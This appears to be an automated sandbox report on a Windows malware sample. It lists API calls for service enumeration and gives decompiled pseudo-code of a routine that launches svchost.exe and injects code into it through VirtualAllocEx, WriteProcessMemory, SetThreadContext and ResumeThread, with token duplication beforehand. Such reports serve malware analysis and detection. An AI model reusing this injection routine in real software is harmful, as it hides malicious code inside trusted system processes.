                                                                                    0x04ec330b
                                                                                    0x04ec331e
                                                                                    0x04ec333e
                                                                                    0x04ec3343
                                                                                    0x04ec3343
                                                                                    0x04ec3300
                                                                                    0x04ec3378
                                                                                    0x04ec3388
                                                                                    0x04ec338e
                                                                                    0x04ec3399
                                                                                    0x04ec33a3
                                                                                    0x04ec33ad
                                                                                    0x04ec33b7
                                                                                    0x04ec33b9
                                                                                    0x04ec33c2
                                                                                    0x04ec33cd
                                                                                    0x04ec33d8
                                                                                    0x04ec33e3
                                                                                    0x04ec33ee
                                                                                    0x04ec33ff
                                                                                    0x04ec3406
                                                                                    0x04ec340c
                                                                                    0x04ec3412
                                                                                    0x04ec341a
                                                                                    0x04ec3426
                                                                                    0x04ec3426
                                                                                    0x04ec342c
                                                                                    0x04ec344d
                                                                                    0x04ec3462
                                                                                    0x04ec348a
                                                                                    0x04ec34a6
                                                                                    0x04ec34c6
                                                                                    0x04ec34d6
                                                                                    0x04ec34d8
                                                                                    0x04ec34df
                                                                                    0x04ec34e8
                                                                                    0x04ec34ec
                                                                                    0x04ec34f1
                                                                                    0x04ec34f5
                                                                                    0x04ec34fd
                                                                                    0x04ec3507
                                                                                    0x04ec350b
                                                                                    0x04ec3522
                                                                                    0x04ec3536
                                                                                    0x04ec3554
                                                                                    0x04ec3563
                                                                                    0x04ec3565
                                                                                    0x04ec356f
                                                                                    0x04ec3586
                                                                                    0x04ec358f
                                                                                    0x04ec3591
                                                                                    0x04ec359b
                                                                                    0x04ec35b2
                                                                                    0x04ec35bb
                                                                                    0x04ec35bd
                                                                                    0x04ec35c7
                                                                                    0x04ec35de
                                                                                    0x04ec35f3
                                                                                    0x04ec35f6
                                                                                    0x04ec35f8
                                                                                    0x04ec3611
                                                                                    0x04ec362c
                                                                                    0x04ec3644
                                                                                    0x04ec365f
                                                                                    0x04ec3677
                                                                                    0x04ec367c
                                                                                    0x04ec3686
                                                                                    0x04ec3695
                                                                                    0x04ec3696
                                                                                    0x04ec369c
                                                                                    0x04ec369f
                                                                                    0x04ec36a5
                                                                                    0x04ec36a8
                                                                                    0x04ec36ae
                                                                                    0x04ec36b4
                                                                                    0x04ec36c0
                                                                                    0x04ec36d0
                                                                                    0x04ec36e4
                                                                                    0x04ec36e7
                                                                                    0x04ec36ef
                                                                                    0x04ec36f7
                                                                                    0x04ec370f
                                                                                    0x04ec307c
                                                                                    0x04ec307d
                                                                                    0x04ec3084
                                                                                    0x04ec309c
                                                                                    0x04ec309c
                                                                                    0x04ec3029
                                                                                    0x04ec302a
                                                                                    0x04ec3042
                                                                                    0x04ec3042
                                                                                    0x04ec2fef
                                                                                    0x04ec2ff0
                                                                                    0x00000000
                                                                                    0x04ec2ff0
                                                                                    0x04ec2fed

                                                                                    APIs
                                                                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 04EC2FAB
                                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,00000000,00000000,00000000,00000000), ref: 04EC2FDF
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC2FF0
                                                                                    • LocalAlloc.KERNEL32(00000040,-0000002C), ref: 04EC301B
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC302A
                                                                                    • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,00000000,00000000,00000000,00000000), ref: 04EC3072
                                                                                    • CloseServiceHandle.ADVAPI32(00000000), ref: 04EC307D
                                                                                    • LocalFree.KERNEL32(00000000), ref: 04EC3084
                                                                                    • LocalAlloc.KERNEL32(00000040,00019000), ref: 04EC30A4
                                                                                    • LocalAlloc.KERNEL32(00000040,00002000), ref: 04EC30C0
                                                                                    • LocalAlloc.KERNEL32(00000040,00002000), ref: 04EC30DB
                                                                                    • OpenServiceW.ADVAPI32(?,00000000,00000001), ref: 04EC3159
                                                                                    • QueryServiceConfigW.ADVAPI32(00000000,00000000,00002000,00000000), ref: 04EC317B
                                                                                    • QueryServiceConfig2W.ADVAPI32(?,00000001,?,00002000,00000000), ref: 04EC31F0
                                                                                    • CloseServiceHandle.ADVAPI32(?), ref: 04EC3207
                                                                                    Strings
                                                                                    • ServiceDll, xrefs: 04EC32C5
                                                                                    • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 04EC3249
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Service$Local$AllocCloseHandle$EnumOpenQueryServicesStatus$ConfigConfig2FreeManager
                                                                                    • String ID: SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                                                    • API String ID: 703603788-2144606380
                                                                                    • Opcode ID: c1de414be6630dd03908ac7a381bfa2d63b780c66ba864cd93f349196f4aabe5
                                                                                    • Instruction ID: 7b1c312ac8a53965cf405664c1ad0f2880a28d47cd589399497f1095d6d83e90
                                                                                    • Opcode Fuzzy Hash: c1de414be6630dd03908ac7a381bfa2d63b780c66ba864cd93f349196f4aabe5
                                                                                    • Instruction Fuzzy Hash: CB2230B190022CABEB21DB68DC85F9EB7B9EF88304F0042D6E509E7151DF75AA94CF50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 04EC98E0, Relevance: 89.7, APIs: 39, Strings: 12, Instructions: 474libraryloaderthreadCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 79%
                                                                                    			E04EC98E0(void* __ebx, intOrPtr __ecx, void* __edx) {
				signed int _v0;
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v24;
				short _v524;
				short _v532;
				short _v548;
				short _v1052;
				struct _CONTEXT _v1764;
				void* _v2048;
				struct _OSVERSIONINFOW _v2052;
				struct _STARTUPINFOW _v2140;
				struct _PROCESS_INFORMATION _v2156;
				void* _v2160;
				void _v2164;
				struct _PROCESS_INFORMATION _v2180;
				void* _v2184;
				long _v2188;
				void* _v2192;
				char _v2196;
				void* _v2200;
				intOrPtr _v2204;
				void* _v2208;
				void* _v2216;
				void* _v2220;
				int _v2224;
				int _v2228;
				void* _v2232;
				void* __edi;
				void* __esi;
				signed int _t117;
				long _t125;
				signed int _t127;
				void* _t135;
				void* _t142;
				void* _t145;
				long _t146;
				_Unknown_base(*)()* _t152;
				signed int _t160;
				signed int _t161;
				_Unknown_base(*)()* _t163;
				void* _t166;
				void* _t173;
				void* _t175;
				void* _t178;
				void* _t182;
				void* _t185;
				long _t188;
				void* _t189;
				void* _t191;
				void* _t198;
				void* _t204;
				long _t205;
				void* _t212;
				intOrPtr _t219;
				void* _t220;
				void* _t224;
				void* _t232;
				intOrPtr* _t234;
				intOrPtr* _t235;
				void* _t250;
				void* _t254;
				void* _t257;
				long _t259;
				void* _t264;
				intOrPtr* _t266;
				void* _t270;
				void* _t272;
				long _t274;
				void* _t275;
				void* _t280;
				void* _t281;
				intOrPtr* _t285;
				long _t286;
				signed int _t290;
				signed int _t292;
				void* _t294;
				signed int _t295;
				void* _t296;
				long _t299;

				_t227 = __ecx;
				_t224 = __ebx;
				_t292 = (_t290 & 0xfffffff0) - 0x898;
				_t117 =  *0x4f03008; // 0x3d21fb31
				_v8 = _t117 ^ _t292;
				_push(_t254);
				_v2140.lpReserved = __edx;
				_v2140.lpDesktop = __ecx;
				E04EDDAD0(_t254,  &(_v2140.dwX), 0, 0x48);
				_v2140.dwX = 0x48;
				_v2180.dwProcessId = 0xc;
				_v2180.hProcess = 0;
				asm("xorps xmm0, xmm0");
				_v2188 = 0;
				asm("movaps [esp+0x3c], xmm0");
				_v2180.dwThreadId = 0;
				E04EDDAD0(_t254,  &_v2052, 0, 0x114);
				_t294 = _t292 + 0x18;
				_v2052.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v2052);
				asm("sbb esi, esi");
				_t269 = 1;
				_v2192 = 1;
				_t125 = E04EC5C60(__ebx, _t254, 1);
				if(_t125 == 0) {
					_t125 = E04EC5D00(_t254, 1);
					_t299 = _t125;
				}
				if(_t299 != 0 && _t269 != 0) {
					_t212 = OpenProcess(0x1fffff, 0, _t125);
					_v2180.dwThreadId = _t212;
					if(_t212 != 0) {
						_t285 = GetProcAddress(LoadLibraryA("kernel32.dll"), "InitializeProcThreadAttributeList");
						_t266 = GetProcAddress(LoadLibraryA("kernel32.dll"), "UpdateProcThreadAttribute");
						if(_t266 != 0) {
							_t303 = _t285;
							if(_t285 != 0) {
								 *_t285(0, 1, 0,  &_v2180);
								_t219 = E04ED5785(_t227, _t285, _t303);
								_t294 = _t294 + 4;
								_v2204 = _t219;
								_t220 =  *_t285(_t219, 1, 0,  &_v2196, _v2196);
								_t286 = _v2220;
								if(_t220 == 0) {
									L10:
									E04ED573F(_t286);
									_t294 = _t294 + 4;
									__eflags = 0;
									_v2220 = 0;
								} else {
									_push(0);
									_push(0);
									_push(4);
									_push( &_v2200);
									_push(0x20000);
									_push(0);
									_push(_t286);
									if( *_t266() == 0) {
										goto L10;
									} else {
										_v2140.dwXSize.cb = _t286;
										_v2232 = 0x8000c;
									}
								}
							}
						}
						_t269 = _v2192;
					}
				}
				_t256 = 0;
				_t127 = GetSystemDirectoryW( &_v1052, 0x104);
				if( *((short*)(_t294 + 0x486 + _t127 * 2)) == 0x5c) {
					L15:
					wsprintfW( &_v532, L"%ssvchost.exe -k SystemNetworkService",  &_v1052);
					_t295 = _t294 + 0xc;
					if(_t269 == 0) {
						L43:
						_t257 = CreateProcessW(0,  &_v524, 0, 0, 0, _v2164, 0, 0,  &(_v2140.dwXSize),  &_v2156);
					} else {
						_v2180.dwThreadId = _t256;
						_v2140.lpReserved = _t256;
						_t232 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSEnumerateSessionsW");
						_v2180.hThread = _t256;
						_v2184 = _t232;
						while(1) {
							_push( &(_v2140.lpReserved));
							_push( &(_v2180.dwThreadId));
							_push(1);
							_push(0);
							_push(0);
							if( *_t232() == 0) {
								goto L43;
							}
							_t250 = _v2156.hProcess;
							_t160 = 0;
							_t274 = _v2188;
							if(_t250 == 0) {
								L24:
								_t161 = 0;
								if(_t250 != 0) {
									_t234 = _t274 + 8;
									while( *_t234 != 1) {
										_t161 = _t161 + 1;
										_t234 = _t234 + 0xc;
										if(_t161 < _t250) {
											continue;
										} else {
										}
										goto L30;
									}
									_t256 =  *(_t274 + (_t161 + _t161 * 2) * 4);
								}
							} else {
								_t235 = _t274 + 8;
								while( *_t235 != 0) {
									_t160 = _t160 + 1;
									_t235 = _t235 + 0xc;
									if(_t160 < _t250) {
										continue;
									} else {
										goto L24;
									}
									goto L30;
								}
								_t256 =  *(_t274 + (_t160 + _t160 * 2) * 4);
								__eflags = _t256;
								if(_t256 == 0) {
									goto L24;
								}
							}
							L30:
							_t163 = GetProcAddress(LoadLibraryA("Wtsapi32.dll"), "WTSFreeMemory");
							 *_t163(_v2188);
							if(_t256 != 0) {
								_v2156.hProcess = _t256;
								_v2200 = 0;
								_v2208 = 0;
								_t166 = OpenProcessToken(GetCurrentProcess(), 0xb,  &_v2200);
								__eflags = _t166;
								if(_t166 != 0) {
									_t173 = DuplicateTokenEx(_v2200, 0x2000000, 0, 0, 1,  &_v2208);
									__eflags = _t173;
									if(_t173 != 0) {
										_t175 = E04ECAA20();
										__eflags = _t175;
										if(_t175 == 0) {
											CloseHandle(_v2216);
											_v2216 = 0;
										} else {
											_t178 = SetTokenInformation(_v2216, 0xc,  &_v2164, 4);
											__eflags = _t178;
											if(_t178 == 0) {
												CloseHandle(_v2220);
												_v2220 = 0;
											}
										}
									}
									CloseHandle(_v2208);
								}
								_t275 = _v2208;
								__eflags = _t275;
								if(_t275 == 0) {
									goto L43;
								} else {
									_t257 = CreateProcessAsUserW(_t275, 0,  &_v548, 0, 0, 0, _v2188, 0, 0,  &_v2140,  &_v2180);
									CloseHandle(_t275);
									__eflags = _t257;
									if(_t257 == 0) {
										goto L43;
									}
								}
							} else {
								Sleep(0xbb8);
								_t232 = _v2208;
								_t280 = _v2200 + 1;
								_v2200 = _t280;
								if(_t280 < 0xa) {
									continue;
								} else {
									goto L43;
								}
							}
							goto L44;
						}
						goto L43;
					}
					L44:
					_t270 = _v2180.hProcess;
					if(_t270 != 0) {
						_t152 = GetProcAddress(LoadLibraryA("kernel32.dll"), "DeleteProcThreadAttributeList");
						if(_t152 != 0) {
							 *_t152(_t270);
						}
						_push(1);
						E04ED5777(_t270);
						_t295 = _t295 + 8;
					}
					_t135 = _v2160;
					if(_t135 != 0) {
						CloseHandle(_t135);
					}
					if(_t257 == 0) {
						L54:
						return E04ED572E(_v0 ^ _t295);
					} else {
						_v1764.ContextFlags = 0x10007;
						if(GetThreadContext(_v2156.hThread,  &_v1764) == 0) {
							goto L54;
						} else {
							_t259 = _v2140.lpTitle;
							_t272 = VirtualAllocEx(_v2156.hProcess, 0, _t259, 0x3000, 0x40);
							if(_t272 != 0) {
								_t142 = WriteProcessMemory(_v2156.hProcess, _t272, _v2140.dwX, _t259,  &(_v2140.dwY));
								__eflags = _t142;
								if(_t142 == 0) {
									goto L53;
								} else {
									_v1764.Eip = _t272;
									_t145 = SetThreadContext(_v2156.hThread,  &_v1764);
									__eflags = _t145;
									if(_t145 == 0) {
										goto L53;
									} else {
										_t146 = ResumeThread(_v2156.hThread);
										__eflags = _t146 - 0xffffffff;
										if(_t146 == 0xffffffff) {
											goto L53;
										} else {
											CloseHandle(_v2156.hThread);
											__eflags = _v0 ^ _t295;
											return E04ED572E(_v0 ^ _t295);
										}
									}
								}
							} else {
								L53:
								TerminateProcess(_v2156, 0);
								goto L54;
							}
						}
					}
				} else {
					 *((short*)(_t294 + 0x488 + _t127 * 2)) = 0x5c;
					_t182 = 2 + _t127 * 2;
					if(_t182 >= 0x208) {
						E04ED5C09();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_t296 = _t294 - 0x10;
						_push(_t224);
						_push(_t269);
						_push(0);
						_v2224 = 0;
						_v2228 = 0;
						E04EC9360(_t224,  &_v2232, 0, _t269, __eflags, L"Dispatch");
						__eflags = _v2232;
						_t261 = CloseHandle;
						if(_v2232 != 0) {
							L72:
							_t281 = 0;
							__eflags = 0;
						} else {
							__eflags = _v20;
							_t226 = WaitForSingleObject;
							if(__eflags == 0) {
								goto L77;
							} else {
								_t205 = E04EC94A0(WaitForSingleObject, L"Dispatch", CloseHandle, _t269, __eflags);
								__eflags = _t205;
								if(__eflags == 0) {
									goto L77;
								} else {
									while(1) {
										__eflags = _t205 - 0x2fffffff;
										if(_t205 == 0x2fffffff) {
											break;
										}
										__eflags = _t205 - 0x1fffffff;
										if(_t205 == 0x1fffffff) {
											break;
										} else {
											_t269 = OpenThread(0x1fffff, 0, _t205);
											__eflags = _t269;
											if(__eflags == 0) {
												goto L77;
											} else {
												WaitForSingleObject(_t269, 0xffffffff);
												__eflags = GetExitCodeThread(_t269,  &_v12);
												if(__eflags == 0) {
													L68:
													__eflags = E04EC9360(_t226,  &_v24, _t261, _t269, __eflags, L"Dispatch");
													if(__eflags != 0) {
														goto L77;
													} else {
														_t205 = E04EC94A0(_t226, L"Dispatch", _t261, _t269, __eflags);
														__eflags = _t205;
														if(__eflags != 0) {
															continue;
														} else {
															while(1) {
																L77:
																_t188 = E04EC94A0(_t226, L"Control", _t261, _t269, __eflags);
																__eflags = _t188;
																if(__eflags == 0) {
																}
																L78:
																_v12 = 0;
																_t191 = E04EC95F0(_t226,  &_v12, _t261, _t269, __eflags);
																_t263 = _t191;
																__eflags = _t191;
																if(__eflags == 0) {
																	L76:
																	_t261 = CloseHandle;
																} else {
																	_t251 = _v12;
																	__eflags = _v12;
																	if(__eflags == 0) {
																		goto L76;
																	} else {
																		_t269 = E04EC98E0(_t226, _t263, _t251,  &_v12);
																		E04ED573F(_t263);
																		_t261 = CloseHandle;
																		_t296 = _t296 + 8;
																		__eflags = _t269;
																		if(__eflags != 0) {
																			__eflags = WaitForSingleObject(_t269, 0xbb8) - 0x102;
																			if(__eflags == 0) {
																				CloseHandle(_t269);
																			}
																		}
																		while(1) {
																			L77:
																			_t188 = E04EC94A0(_t226, L"Control", _t261, _t269, __eflags);
																			__eflags = _t188;
																			if(__eflags == 0) {
																			}
																			goto L78;
																		}
																	}
																	while(1) {
																		L77:
																		_t188 = E04EC94A0(_t226, L"Control", _t261, _t269, __eflags);
																		__eflags = _t188;
																		if(__eflags == 0) {
																		}
																		goto L83;
																	}
																	goto L78;
																}
																continue;
																L83:
																__eflags = _t188 - 0x1fffffff;
																if(_t188 == 0x1fffffff) {
																	do {
																		_t189 = SetConsoleCtrlHandler(E04ECA880, 0);
																		__eflags = _t189;
																	} while (_t189 != 0);
																	_t281 = 0x315;
																} else {
																	__eflags = _t188 - 0x2fffffff;
																	if(__eflags != 0) {
																		_t269 = OpenThread(0x1fffff, 0, _t188);
																		__eflags = _t269;
																		if(__eflags == 0) {
																			goto L78;
																		} else {
																			WaitForSingleObject(_t269, 0xffffffff);
																			CloseHandle(_t269);
																		}
																		continue;
																	} else {
																		Sleep(0x7d0);
																		_v12 = 0;
																		_t198 = E04EC95F0(_t226,  &_v12, _t261, _t269, __eflags);
																		_t269 = _t198;
																		__eflags = _t198;
																		if(__eflags == 0) {
																			continue;
																		} else {
																			_t252 = _v12;
																			__eflags = _v12;
																			if(__eflags == 0) {
																				continue;
																			} else {
																				_t264 = E04EC98E0(_t226, _t269, _t252,  &_v12);
																				E04ED573F(_t269);
																				_t296 = _t296 + 8;
																				__eflags = _t264;
																				if(__eflags == 0) {
																					goto L76;
																				} else {
																					__eflags = WaitForSingleObject(_t264, 0xbb8) - 0x102;
																					if(__eflags != 0) {
																						goto L76;
																					} else {
																						CloseHandle(_t264);
																						E04EB78A0(_t226, L"Dispatch", 0x2fffffff, CloseHandle, _t269, __eflags);
																						do {
																							_t204 = SetConsoleCtrlHandler(E04ECA880, 0);
																							__eflags = _t204;
																						} while (_t204 != 0);
																						_t281 = 0x315;
																					}
																				}
																			}
																		}
																	}
																}
																goto L73;
															}
														}
													}
												} else {
													__eflags = _v12 - 0x315;
													if(__eflags == 0) {
														goto L72;
													} else {
														goto L68;
													}
												}
											}
										}
										goto L73;
									}
									E04ECA860();
									goto L72;
								}
							}
						}
						L73:
						_t185 = _v16;
						__eflags = _t185;
						if(_t185 != 0) {
							CloseHandle(_t185);
						}
						return _t281;
					} else {
						 *((short*)(_t294 + _t182 + 0x488)) = 0;
						goto L15;
					}
				}
			}





















































































                                                                                    0x04ec98e0
                                                                                    0x04ec98e0
                                                                                    0x04ec98e6
                                                                                    0x04ec98ec
                                                                                    0x04ec98f3
                                                                                    0x04ec98fb
                                                                                    0x04ec9902
                                                                                    0x04ec9909
                                                                                    0x04ec990d
                                                                                    0x04ec9915
                                                                                    0x04ec991f
                                                                                    0x04ec992e
                                                                                    0x04ec9936
                                                                                    0x04ec9939
                                                                                    0x04ec9944
                                                                                    0x04ec9949
                                                                                    0x04ec994d
                                                                                    0x04ec9952
                                                                                    0x04ec9955
                                                                                    0x04ec9968
                                                                                    0x04ec9976
                                                                                    0x04ec9978
                                                                                    0x04ec9979
                                                                                    0x04ec997d
                                                                                    0x04ec9984
                                                                                    0x04ec9986
                                                                                    0x04ec998b
                                                                                    0x04ec998b
                                                                                    0x04ec9993
                                                                                    0x04ec99a9
                                                                                    0x04ec99af
                                                                                    0x04ec99b5
                                                                                    0x04ec99d8
                                                                                    0x04ec99e3
                                                                                    0x04ec99e7
                                                                                    0x04ec99e9
                                                                                    0x04ec99eb
                                                                                    0x04ec99f8
                                                                                    0x04ec99fe
                                                                                    0x04ec9a03
                                                                                    0x04ec9a06
                                                                                    0x04ec9a14
                                                                                    0x04ec9a16
                                                                                    0x04ec9a1c
                                                                                    0x04ec9a48
                                                                                    0x04ec9a49
                                                                                    0x04ec9a4e
                                                                                    0x04ec9a51
                                                                                    0x04ec9a53
                                                                                    0x04ec9a1e
                                                                                    0x04ec9a1e
                                                                                    0x04ec9a20
                                                                                    0x04ec9a22
                                                                                    0x04ec9a28
                                                                                    0x04ec9a29
                                                                                    0x04ec9a2e
                                                                                    0x04ec9a30
                                                                                    0x04ec9a35
                                                                                    0x00000000
                                                                                    0x04ec9a37
                                                                                    0x04ec9a37
                                                                                    0x04ec9a3e
                                                                                    0x04ec9a3e
                                                                                    0x04ec9a35
                                                                                    0x04ec9a1c
                                                                                    0x04ec99eb
                                                                                    0x04ec9a57
                                                                                    0x04ec9a57
                                                                                    0x04ec99b5
                                                                                    0x04ec9a67
                                                                                    0x04ec9a6a
                                                                                    0x04ec9a79
                                                                                    0x04ec9aa4
                                                                                    0x04ec9ab9
                                                                                    0x04ec9abf
                                                                                    0x04ec9ac4
                                                                                    0x04ec9c7e
                                                                                    0x04ec9ca6
                                                                                    0x04ec9aca
                                                                                    0x04ec9ad4
                                                                                    0x04ec9ad8
                                                                                    0x04ec9ae9
                                                                                    0x04ec9aeb
                                                                                    0x04ec9aef
                                                                                    0x04ec9af3
                                                                                    0x04ec9af7
                                                                                    0x04ec9afc
                                                                                    0x04ec9afd
                                                                                    0x04ec9aff
                                                                                    0x04ec9b01
                                                                                    0x04ec9b07
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9b0d
                                                                                    0x04ec9b11
                                                                                    0x04ec9b13
                                                                                    0x04ec9b19
                                                                                    0x04ec9b39
                                                                                    0x04ec9b39
                                                                                    0x04ec9b3d
                                                                                    0x04ec9b3f
                                                                                    0x04ec9b42
                                                                                    0x04ec9b47
                                                                                    0x04ec9b48
                                                                                    0x04ec9b4d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9b4f
                                                                                    0x00000000
                                                                                    0x04ec9b4d
                                                                                    0x04ec9b54
                                                                                    0x04ec9b54
                                                                                    0x04ec9b1b
                                                                                    0x04ec9b1b
                                                                                    0x04ec9b20
                                                                                    0x04ec9b25
                                                                                    0x04ec9b26
                                                                                    0x04ec9b2b
                                                                                    0x00000000
                                                                                    0x04ec9b2d
                                                                                    0x00000000
                                                                                    0x04ec9b2d
                                                                                    0x00000000
                                                                                    0x04ec9b2b
                                                                                    0x04ec9b32
                                                                                    0x04ec9b35
                                                                                    0x04ec9b37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9b37
                                                                                    0x04ec9b57
                                                                                    0x04ec9b68
                                                                                    0x04ec9b72
                                                                                    0x04ec9b76
                                                                                    0x04ec9b9e
                                                                                    0x04ec9ba2
                                                                                    0x04ec9baa
                                                                                    0x04ec9bc0
                                                                                    0x04ec9bc6
                                                                                    0x04ec9bc8
                                                                                    0x04ec9bde
                                                                                    0x04ec9be4
                                                                                    0x04ec9be6
                                                                                    0x04ec9be8
                                                                                    0x04ec9bed
                                                                                    0x04ec9bef
                                                                                    0x04ec9c28
                                                                                    0x04ec9c2a
                                                                                    0x04ec9bf1
                                                                                    0x04ec9bfe
                                                                                    0x04ec9c0a
                                                                                    0x04ec9c0c
                                                                                    0x04ec9c12
                                                                                    0x04ec9c14
                                                                                    0x04ec9c14
                                                                                    0x04ec9c0c
                                                                                    0x04ec9bef
                                                                                    0x04ec9c3e
                                                                                    0x04ec9c3e
                                                                                    0x04ec9c40
                                                                                    0x04ec9c44
                                                                                    0x04ec9c46
                                                                                    0x00000000
                                                                                    0x04ec9c48
                                                                                    0x04ec9c72
                                                                                    0x04ec9c74
                                                                                    0x04ec9c7a
                                                                                    0x04ec9c7c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9c7c
                                                                                    0x04ec9b78
                                                                                    0x04ec9b7d
                                                                                    0x04ec9b87
                                                                                    0x04ec9b8b
                                                                                    0x04ec9b8c
                                                                                    0x04ec9b93
                                                                                    0x00000000
                                                                                    0x04ec9b99
                                                                                    0x00000000
                                                                                    0x04ec9b99
                                                                                    0x04ec9b93
                                                                                    0x00000000
                                                                                    0x04ec9b76
                                                                                    0x00000000
                                                                                    0x04ec9af3
                                                                                    0x04ec9ca8
                                                                                    0x04ec9ca8
                                                                                    0x04ec9cae
                                                                                    0x04ec9cc1
                                                                                    0x04ec9cc9
                                                                                    0x04ec9ccc
                                                                                    0x04ec9ccc
                                                                                    0x04ec9cce
                                                                                    0x04ec9cd1
                                                                                    0x04ec9cd6
                                                                                    0x04ec9cd6
                                                                                    0x04ec9cd9
                                                                                    0x04ec9cdf
                                                                                    0x04ec9ce2
                                                                                    0x04ec9ce2
                                                                                    0x04ec9cea
                                                                                    0x04ec9d37
                                                                                    0x04ec9d4c
                                                                                    0x04ec9cec
                                                                                    0x04ec9cf3
                                                                                    0x04ec9d0b
                                                                                    0x00000000
                                                                                    0x04ec9d0d
                                                                                    0x04ec9d0d
                                                                                    0x04ec9d25
                                                                                    0x04ec9d29
                                                                                    0x04ec9d5c
                                                                                    0x04ec9d62
                                                                                    0x04ec9d64
                                                                                    0x00000000
                                                                                    0x04ec9d66
                                                                                    0x04ec9d6d
                                                                                    0x04ec9d79
                                                                                    0x04ec9d7f
                                                                                    0x04ec9d81
                                                                                    0x00000000
                                                                                    0x04ec9d83
                                                                                    0x04ec9d87
                                                                                    0x04ec9d8d
                                                                                    0x04ec9d90
                                                                                    0x00000000
                                                                                    0x04ec9d92
                                                                                    0x04ec9d96
                                                                                    0x04ec9da9
                                                                                    0x04ec9db3
                                                                                    0x04ec9db3
                                                                                    0x04ec9d90
                                                                                    0x04ec9d81
                                                                                    0x04ec9d2b
                                                                                    0x04ec9d2b
                                                                                    0x04ec9d31
                                                                                    0x00000000
                                                                                    0x04ec9d31
                                                                                    0x04ec9d29
                                                                                    0x04ec9d0b
                                                                                    0x04ec9a7b
                                                                                    0x04ec9a80
                                                                                    0x04ec9a88
                                                                                    0x04ec9a94
                                                                                    0x04ec9db4
                                                                                    0x04ec9db9
                                                                                    0x04ec9dba
                                                                                    0x04ec9dbb
                                                                                    0x04ec9dbc
                                                                                    0x04ec9dbd
                                                                                    0x04ec9dbe
                                                                                    0x04ec9dbf
                                                                                    0x04ec9dc3
                                                                                    0x04ec9dc6
                                                                                    0x04ec9dc7
                                                                                    0x04ec9dc8
                                                                                    0x04ec9dd1
                                                                                    0x04ec9dd8
                                                                                    0x04ec9ddf
                                                                                    0x04ec9de4
                                                                                    0x04ec9de8
                                                                                    0x04ec9dee
                                                                                    0x04ec9e7b
                                                                                    0x04ec9e7b
                                                                                    0x04ec9e7b
                                                                                    0x04ec9df4
                                                                                    0x04ec9df4
                                                                                    0x04ec9df8
                                                                                    0x04ec9dfe
                                                                                    0x00000000
                                                                                    0x04ec9e04
                                                                                    0x04ec9e09
                                                                                    0x04ec9e0e
                                                                                    0x04ec9e10
                                                                                    0x00000000
                                                                                    0x04ec9e16
                                                                                    0x04ec9e16
                                                                                    0x04ec9e16
                                                                                    0x04ec9e1b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x04ec9e1d
                                                                                    0x04ec9e22
                                                                                    0x00000000
                                                                                    0x04ec9e24
                                                                                    0x04ec9e32
                                                                                    0x04ec9e34
                                                                                    0x04ec9e36
                                                                                    0x00000000
                                                                                    0x04ec9e38
                                                                                    0x04ec9e3b
                                                                                    0x04ec9e48
                                                                                    0x04ec9e4a
                                                                                    0x04ec9e55
                                                                                    0x04ec9e62
                                                                                    0x04ec9e64
                                                                                    0x00000000
                                                                                    0x04ec9e66
                                                                                    0x04ec9e6b
                                                                                    0x04ec9e70
                                                                                    0x04ec9e72
                                                                                    0x00000000
                                                                                    0x04ec9e74
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x04ec9eae
                                                                                    0x04ec9eb1
                                                                                    0x04ec9eb8
                                                                                    0x04ec9ebd
                                                                                    0x04ec9ebf
                                                                                    0x04ec9ec1
                                                                                    0x04ec9e92
                                                                                    0x04ec9e92
                                                                                    0x04ec9ec3
                                                                                    0x04ec9ec3
                                                                                    0x04ec9ec6
                                                                                    0x04ec9ec8
                                                                                    0x00000000
                                                                                    0x04ec9eca
                                                                                    0x04ec9ed3
                                                                                    0x04ec9ed5
                                                                                    0x04ec9eda
                                                                                    0x04ec9ee0
                                                                                    0x04ec9ee3
                                                                                    0x04ec9ee5
                                                                                    0x04ec9eef
                                                                                    0x04ec9ef4
                                                                                    0x04ec9ef7
                                                                                    0x04ec9ef7
                                                                                    0x04ec9ef4
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9eac
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea0
                                                                                    0x04ec9ea5
                                                                                    0x04ec9eaa
                                                                                    0x04ec9eac
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9eac
                                                                                    0x00000000
                                                                                    0x04ec9ea0
                                                                                    0x00000000
                                                                                    0x04ec9efb
                                                                                    0x04ec9efb
                                                                                    0x04ec9f00
                                                                                    0x04ec9fd2
                                                                                    0x04ec9fd9
                                                                                    0x04ec9fdb
                                                                                    0x04ec9fdb
                                                                                    0x04ec9fdf
                                                                                    0x04ec9f06
                                                                                    0x04ec9f06
                                                                                    0x04ec9f0b
                                                                                    0x04ec9fb5
                                                                                    0x04ec9fb7
                                                                                    0x04ec9fb9
                                                                                    0x00000000
                                                                                    0x04ec9fbf
                                                                                    0x04ec9fc2
                                                                                    0x04ec9fc5
